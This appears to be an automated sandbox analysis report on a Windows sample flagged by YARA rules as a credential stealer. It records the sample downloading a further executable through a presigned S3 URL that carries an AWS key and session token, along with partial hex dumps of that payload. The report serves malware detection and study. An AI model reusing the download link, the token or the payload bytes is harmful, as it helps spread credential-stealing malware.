                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        9192.168.2.74977516.182.101.2494437624C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        2024-12-23 07:19:34 UTC1348OUTGET /70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-464c-9988-4c3c4d541130/FormattingCharitable.exe?response-content-disposition=attachment%3B%20filename%3D%22FormattingCharitable.exe%22&AWSAccessKeyId=ASIA6KOSE3BNIFBW6TYB&Signature=PelXt66tJz%2FulrB0cB0%2BaL7%2Bi5E%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEAgaCXVzLWVhc3QtMSJHMEUCIQD%2BsOmmZbJoeqQMRgcbUIKewsPYW2aBXNNdnqSZnOjDFwIgR8XEHN13jTNswyI0HHU0LSuyGD%2FTMiS45XjOxzfx2bUqsAII0P%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FARAAGgw5ODQ1MjUxMDExNDYiDKLERm7AyKJmGnsaryqEAiz2RQWxEcCBLMIfVp3H4PSzeOX5Dz20ShaLz%2BgE9TIlAJRJj3b2E09svKzFkLddqGwYqC2K%2FKIH%2B43EpJ156iF0t0YnErOxg3PyYWT2PSMugnEx4xgVbJpkrwOS%2BaXe%2FSsC4UOf%2F83UoqmwNPRhKyzztbcDpxLcWerZy9Q6aovVLfMedeL2%2BzfXvbpi8S9915xhF0Cpozy3i0jpnDfou%2FWMrbGZX8d8kbOTHT2AOnqFdwajWkRe0yZY7VqHnS4UnUUU2gtvmzbAh%2B9Byjxps3Oa32XIPpDohq%2Fsd63Twd%2FTpUBNqNyZ3%2BxCnHgqoVCvvdq8kFyXYiW9CTBL2KWz0BWyfxXEMIaYpLsGOp0BYb7jWXl2rvZ6kkWiTN4Lg4p1xTsXw8YInPWUnYT2zjLbcrffJNmSPBWt8S40YM7x5zFblDt5Ez56YqzuxoQvJUGtRwLyEvmWXdiFc4qnFdZ23f1PLTAyj9H [TRUNCATED]
                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                        Host: bbuseruploads.s3.amazonaws.com
                                                                                                                                                        2024-12-23 07:19:34 UTC554INHTTP/1.1 200 OK
                                                                                                                                                        x-amz-id-2: uLVZbKMk9xSeMDyGKv3AN6TYAjsilhoNlQadlUWvvzSmhHymV5e59MekN60suEl4OJ/K3qwKX2E=
                                                                                                                                                        x-amz-request-id: YQ6ZRZ8G94EY7ZC4
                                                                                                                                                        Date: Mon, 23 Dec 2024 07:19:35 GMT
                                                                                                                                                        Last-Modified: Sun, 22 Dec 2024 18:56:57 GMT
                                                                                                                                                        ETag: "73565a0bcdcb7ff5f9ce005a2530e215"
                                                                                                                                                        x-amz-server-side-encryption: AES256
                                                                                                                                                        x-amz-version-id: 7hbzHT1uhpKzZ7nBtmVCaxIrBpJnNbOS
                                                                                                                                                        Content-Disposition: attachment; filename="FormattingCharitable.exe"
                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                        Content-Type: application/x-msdownload
                                                                                                                                                        Content-Length: 1325507
                                                                                                                                                        Server: AmazonS3
                                                                                                                                                        Connection: close
                                                                                                                                                        2024-12-23 07:19:34 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 41 7b d1 6b 05 1a bf 38 05 1a bf 38 05 1a bf 38 0c 62 3c 38 06 1a bf 38 0c 62 2c 38 14 1a bf 38 05 1a be 38 a9 1a bf 38 1e 87 15 38 09 1a bf 38 1e 87 25 38 04 1a bf 38 1e 87 22 38 04 1a bf 38 52 69 63 68 05 1a bf 38 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 e4 e2 47 4f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 74 00 00 00 f0 0b 00 00 42 00 00 af 38 00 00 00 10 00
                                                                                                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$A{k888b<88b,888888%88"88Rich8PELGOtB8
                                                                                                                                                        2024-12-23 07:19:34 UTC470INData Raw: 00 ff 75 f8 e8 bb f1 ff ff e9 7b 03 00 00 ff 75 fc e8 ae f1 ff ff 33 db 81 7d 0c 05 04 00 00 75 11 89 5d 10 c7 45 14 01 00 00 00 c7 45 0c 0f 04 00 00 83 7d 0c 4e b8 13 04 00 00 74 09 39 45 0c 0f 85 dc 00 00 00 8b 7d 14 39 45 0c 74 0d 81 7f 04 08 04 00 00 0f 85 c7 00 00 00 f7 05 08 eb 47 00 00 02 00 00 75 79 39 45 0c 74 09 8b 4d 14 83 79 08 fe 75 6b 33 c9 39 45 0c 0f 95 c1 51 ff 75 fc e8 f4 fb ff ff 3b c3 7c 56 8b 55 e8 8b c8 69 c9 20 40 00 00 8d 54 11 08 8b 0a f6 c1 10 75 40 f6 c1 40 74 14 81 f1 80 00 00 00 84 c9 79 05 83 c9 01 eb 08 83 e1 fe eb 03 83 f1 01 50 89 0a e8 c2 c4 ff ff a1 08 eb 47 00 33 c9 c1 e8 08 41 f7 d0 23 c1 89 4d 10 89 45 14 c7 45 0c 0f 04 00 00 3b fb 74 3e 81 7f 08 3d fe ff ff 75 0e ff 77 5c 53 68 19 04 00 00 ff 75 fc ff d6 81 7f 08 39
                                                                                                                                                        Data Ascii: u{u3}u]EE}Nt9E}9EtGuy9EtMyuk39EQu;|VUi @Tu@@tyPG3A#MEE;t>=uw\Shu9
                                                                                                                                                        2024-12-23 07:19:35 UTC16384INData Raw: 07 50 ff 15 30 91 40 00 89 1d 68 1d 44 00 89 1d 6c 1d 44 00 89 1d 10 eb 47 00 81 7d 0c 0f 04 00 00 0f 85 4b 01 00 00 53 53 e8 f4 c3 ff ff 39 5d 10 74 07 6a 08 e8 0d c6 ff ff 39 5d 14 74 3f ff 35 6c 1d 44 00 e8 d1 c4 ff ff 8b f8 57 e8 7e c4 ff ff 33 c0 33 c9 3b fb 7e 0e 8b 55 e4 39 1c 82 74 01 41 40 3b c7 7c f2 53 51 68 4e 01 00 00 ff 75 f8 ff d6 89 7d 14 c7 45 0c 20 04 00 00 53 53 e8 9d c3 ff ff a1 6c 1d 44 00 89 45 e0 a1 c8 ea 47 00 c7 45 c4 30 f0 00 00 89 5d e8 39 1d cc ea 47 00 0f 8e a1 00 00 00 8d 78 08 8b 45 e0 8b 4d e8 8b 04 88 3b c3 74 79 8b 0f 89 45 bc c7 45 b8 08 00 00 00 f7 c1 00 01 00 00 74 13 8d 47 10 c7 45 b8 09 00 00 00 89 45 c8 81 27 ff fe ff ff f6 c1 40 74 05 6a 03 58 eb 0e 8b c1 83 e0 01 40 f6 c1 10 74 03 83 c0 03 ff 75 bc 8b d1 c1 e0 0b
                                                                                                                                                        Data Ascii: P0@hDlDG}KSS9]tj9]t?5lDW~33;~U9tA@;|SQhNu}E SSlDEGE0]9GxEM;tyEEtGEE'@tjX@tu
                                                                                                                                                        2024-12-23 07:19:35 UTC1024INData Raw: 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 65 00 6d 00 70 00 74 00 79 00 00 00 00 00 45 00 78 00 63 00 68 00 3a 00 20 00 73 00 74 00 61 00 63 00 6b 00 20 00 3c 00 20 00 25 00 64 00 20 00 65 00 6c 00 65 00 6d 00 65 00 6e 00 74 00 73 00 00 00 52 00 4d 00 44 00 69 00 72 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 42 00 6f 00 78 00 3a 00 20 00 25 00 64 00 2c 00 22 00 25 00 73 00 22 00 00 00 44 00 65 00 6c 00 65 00 74 00 65 00 3a 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 25 00 73 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 77 00 72 00 6f 00 74 00 65 00 20 00 25 00 64 00 20 00 74 00 6f 00 20 00 22 00 25 00 73 00 22 00 00 00 00 00 46 00 69 00 6c 00 65 00 3a 00 20 00 65 00 72 00 72 00 6f 00 72 00 2c 00 20
                                                                                                                                                        Data Ascii: : stack emptyExch: stack < %d elementsRMDir: "%s"MessageBox: %d,"%s"Delete: "%s"%sFile: wrote %d to "%s"File: error,
                                                                                                                                                        2024-12-23 07:19:35 UTC16384INData Raw: 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 2d 00 20 00 61 00 20 00 66 00 69 00 6c 00 65 00 20 00 61 00 6c 00 72 00 65 00 61 00 64 00 79 00 20 00 65 00 78 00 69 00 73 00 74 00 73 00 00 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 63 00 61 00 6e 00 27 00 74 00 20 00 63 00 72 00 65 00 61 00 74 00 65 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 65 00 72 00 72 00 3d 00 25 00 64 00 29 00 00 00 43 00 72 00 65 00 61 00 74 00 65 00 44 00 69 00 72 00 65 00 63 00 74 00 6f 00 72 00 79 00 3a 00 20 00 22 00 25 00 73 00 22 00 20 00 28 00 25 00 64 00 29 00 00 00 00 00 53 00 65 00 74 00 46 00 69 00 6c 00 65 00 41 00 74 00 74 00 72
                                                                                                                                                        Data Ascii: : can't create "%s" - a file already existsCreateDirectory: can't create "%s" (err=%d)CreateDirectory: "%s" (%d)SetFileAttr
                                                                                                                                                        2024-12-23 07:19:35 UTC1024INData Raw: 08 ce 07 cd e8 df bf 7f 82 30 a8 57 9f 88 81 3d 7b 87 3d 3d 76 58 69 b7 f9 13 7f db ed 8d 09 ff d1 73 ec 8b 65 98 86 79 fa f2 e6 7a 40 df be 7d 13 00 c6 9f 7d d6 c6 c5 d3 9f bd 88 67 9e 79 a6 55 d8 60 c7 f7 ec d9 33 01 60 5c 47 a6 5b cd 7f e2 89 27 e2 d9 70 26 00 8c b7 95 47 1f 7d f4 b2 e0 c6 c1 45 74 eb f6 70 d4 93 0f 3e 19 33 fc 91 21 b5 53 9e 9a f0 a7 89 3d c7 fd f9 b9 47 fb d5 3d d8 fd c1 98 ae dd ba 46 61 19 36 81 6d 82 8d 5a 6b 24 e8 b0 e9 32 89 07 dc 28 8c e3 f9 71 fc 19 ab c3 26 31 9a 3f 0f f1 32 5e 6c 78 b6 b7 6f df 7e f9 cf 7e f6 b3 79 d0 16 d6 18 9c 2a c0 a9 01 31 01 72 f1 e5 c3 8c 98 00 68 15 34 0b da 65 75 2a 00 5a f7 c3 30 00 fd 37 1c 19 f4 dc ba 7a df 7e 6b ea f7 0d 5c 53 89 1d be 9a 03 0a 41 5a ff 28 18 ab ae 7f 5c 61 89 8b 2c 70 a5 3f ba
                                                                                                                                                        Data Ascii: 0W={==vXiseyz@}}gyU`3`\G['p&G}Etp>3!S=G=Fa6mZk$2(q&1?2^lxo~~y*1rh4eu*Z07z~k\SAZ(\a,p?
                                                                                                                                                        2024-12-23 07:19:35 UTC10749INData Raw: db d6 0c 99 2f df b7 6f df ae d0 97 b9 12 64 7d e6 7a e5 7f e5 bf f5 ef 3a b2 dd 82 be af 40 ca 40 ca 05 65 85 f2 43 59 a2 7c d9 20 71 99 2f 27 36 0c c4 86 41 21 e3 6c b2 88 cd 83 e2 bd f7 de 53 98 df 4d d8 64 34 03 c7 d9 0a 36 21 cd 90 7a e1 08 a9 3f 26 66 3d 33 eb a3 59 6f cd 7a 2e 48 1c 98 71 62 62 c6 99 19 87 82 19 af 12 c7 12 df 8a 99 1c f3 af 4c a7 59 d3 67 d0 ac 19 b6 7c f0 ca f4 57 88 8d 0b 21 af e8 4c 9e 3c b9 19 6c 4e 2c 61 93 d2 08 1b 15 e2 1c a5 c6 f1 1b 36 40 6d 5e 9f be 1e 80 f5 58 c1 c6 a6 19 dc 08 52 b0 d9 69 06 e7 4b 4b d8 cc 28 d8 bc 34 83 cd 8b 82 4d 8b 25 6c 62 14 c3 86 0d a3 a1 c3 87 d2 d0 61 43 69 cc 8b a3 69 da f3 93 68 76 5f 2e d3 9e 36 03 30 72 c0 70 1a f2 e2 10 7a e1 c5 17 88 f3 36 b1 99 69 06 9b 17 05 9b 1a 85 7c 67 d3 a2 60 d3
                                                                                                                                                        Data Ascii: /od}z:@@eCY| q/'6A!lSMd46!z?&f=3Yoz.HqbbLYg|W!L<lN,a6@m^XRiKK(4M%lbaCiihv_.60rpz6i|g`
                                                                                                                                                        2024-12-23 07:19:35 UTC16384INData Raw: 90 4f 56 90 9a 56 96 c3 2d 79 fb b2 0a 08 37 72 1a 7e 5b 90 4f d9 45 05 94 c5 fb 9c 71 28 8a 32 0e 46 50 66 42 32 cf e3 e5 79 bd ba c0 ab 46 92 d6 50 6a 9c 6e ff de 16 b0 3e e4 45 d4 2b d4 65 d3 00 a0 95 6f 65 00 30 0d a7 01 c4 00 e0 6e 01 5c 00 08 0d 41 4f 00 2e 24 8c 88 88 50 2f 6e 82 e6 f4 eb d7 4f bd 0b a0 05 03 30 8e 75 0a a7 c6 a1 57 d0 2e 68 d8 75 03 60 1f ae ba 01 c0 6b 3a f1 72 0d 04 30 9e e2 f7 cb 5f fd 52 b9 b8 a3 dc 62 2a c8 e4 20 8e 89 a3 b4 e8 58 4a 4f 48 a4 d4 24 0e 60 04 2f 8b bb 04 71 4b 58 99 02 45 3a bb ff c2 24 4a c9 4f a6 82 5d e5 74 94 85 ff a3 76 ff ad 38 fa f4 17 54 b0 b3 9c 52 f3 f9 f7 45 1c f4 99 4d 3d 07 2d 19 00 f9 d4 31 03 55 12 83 98 00 95 d8 8a 99 f2 22 45 61 31 27 b6 02 4e 6c 48 6e 85 f6 a4 56 64 4b 74 e8 09 a8 2e a9 a1 f0
                                                                                                                                                        Data Ascii: OVV-y7r~[OEq(2FPfB2yFPjn>E+eoe0n\AO.$P/nO0uW.hu`k:r0_Rb* XJOH$`/qKXE:$JO]tv8TREM=-1U"Ea1'NlHnVdKt.
                                                                                                                                                        2024-12-23 07:19:35 UTC1024INData Raw: 82 a2 79 5a 3a 9b 03 b4 fe f5 73 c1 ba 19 d0 0d 81 18 01 c1 34 02 82 08 98 89 08 9c 89 08 60 6b 98 42 7a a9 58 ad d3 0a 47 db 28 06 c0 11 98 5f 52 54 6a bb e0 af a4 9a 8a 0b b9 45 6f f1 bf fa 3a f5 ef 52 4e 52 8e 52 b6 f8 94 f2 c6 f2 68 fd e3 b9 ff 30 00 38 0d 50 5f 53 4d d5 65 25 54 59 94 4f 0d 55 e5 74 ee f4 09 fa f0 ec 49 3a 51 c7 a2 5f 5a a8 ae 09 a8 a9 28 a5 aa ca 0a 75 11 60 45 05 9e 46 58 a2 fe 0b c7 57 c4 5f 7a 8e a4 f7 08 9f 71 31 f1 14 16 1c 49 c1 fe 61 aa eb 3f fc 50 14 c5 46 e3 c9 7c 5c e7 12 6d f5 4e ea a5 d4 55 b3 1e 4b d7 3e a6 c9 b8 23 c1 17 a4 a5 0f b1 17 11 d6 0d 80 cc 83 d0 22 76 11 e7 2a 17 d8 3f 75 a4 d1 e0 08 f5 4e 79 3b f8 8e dc 80 d8 57 c2 6e 11 df 82 e4 01 47 48 de 68 2b ba 88 eb 98 82 dc 1a 92 bf 4c 24 bf b5 86 f9 3b 3d 4f 02 f9
                                                                                                                                                        Data Ascii: yZ:s4`kBzXG(_RTjEo:RNRRh08P_SMe%TYOUtI:Q_Z(u`EFXW_zq1Ia?PF|\mNUK>#"v*?uNy;WnGHh+L$;=O
                                                                                                                                                        2024-12-23 07:19:35 UTC16384INData Raw: c3 00 98 82 8f bc e1 08 b4 34 91 5b 90 27 10 fb 22 e6 12 e3 97 82 2e da 0e 91 3c 82 71 e4 17 03 95 77 78 9e 9e 83 24 2f b5 15 33 9f c9 77 c9 77 66 de 33 a7 0b ba 68 03 c9 9f 66 1e 95 ef 66 9e 35 bf 0b 8e f2 33 c0 77 1c 17 3c eb 1f e7 f2 75 61 97 71 e8 84 ce ea d5 ab 1b c1 7c f4 12 e0 42 40 3c 0b 00 eb 44 19 e2 18 2f 5f be 9c a6 4e 9d aa 0c c0 73 cf 3d f7 af 6d 00 c6 8c d9 70 f7 a8 51 ce 7d 46 0d 75 ea 39 be cf 36 3c b2 f0 aa 0e 23 dd da fd 74 4c f6 4d cf 8c 48 b8 f1 d9 a7 d6 b7 bb c3 3e 19 a7 03 50 28 78 f2 e0 25 19 00 5c 9d 09 87 86 0a 80 24 82 04 84 a4 82 60 81 23 44 a0 7a b8 7b 90 97 3b 07 b5 87 17 ed f4 df 43 6b c3 37 d3 fa d0 ad e4 ea e3 46 fe 7b b9 22 b2 19 68 4c 06 fc 89 df 99 15 0c a0 12 a2 e2 4a 45 97 40 d0 83 48 0f 40 33 88 c5 04 48 b2 10 74 23
                                                                                                                                                        Data Ascii: 4['".<qwx$/3wwf3hff53w<uaq|B@<D/_Ns=mpQ}Fu96<#tLMH>P(x%\$`#Dz{;Ck7F{"hLJE@H@3Ht#


                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Click to dive into process behavior distribution

                                                                                                                                                        Click to jump to process

                                                                                                                                                        Target ID:0
                                                                                                                                                        Start time:02:18:59
                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                        Path:C:\Users\user\Desktop\LP4a6BowQN.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:"C:\Users\user\Desktop\LP4a6BowQN.exe"
                                                                                                                                                        Imagebase:0x7e0000
                                                                                                                                                        File size:2'969'088 bytes
                                                                                                                                                        MD5 hash:80429EC2B7C1A75BC06B68846EB8BE34
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Yara matches:
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1519966217.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.1479177875.0000000000BA3000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                        Reputation:low
                                                                                                                                                        Has exited:true

                                                                                                                                                        Target ID:6
                                                                                                                                                        Start time:04:17:42
                                                                                                                                                        Start date:23/12/2024
                                                                                                                                                        Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        Wow64 process (32bit):true
                                                                                                                                                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7624 -s 1948
                                                                                                                                                        Imagebase:0x120000
                                                                                                                                                        File size:483'680 bytes
                                                                                                                                                        MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                        Has elevated privileges:true
                                                                                                                                                        Has administrator privileges:true
                                                                                                                                                        Programmed in:C, C++ or other language
                                                                                                                                                        Reputation:high
                                                                                                                                                        Has exited:true

                                                                                                                                                        No disassembly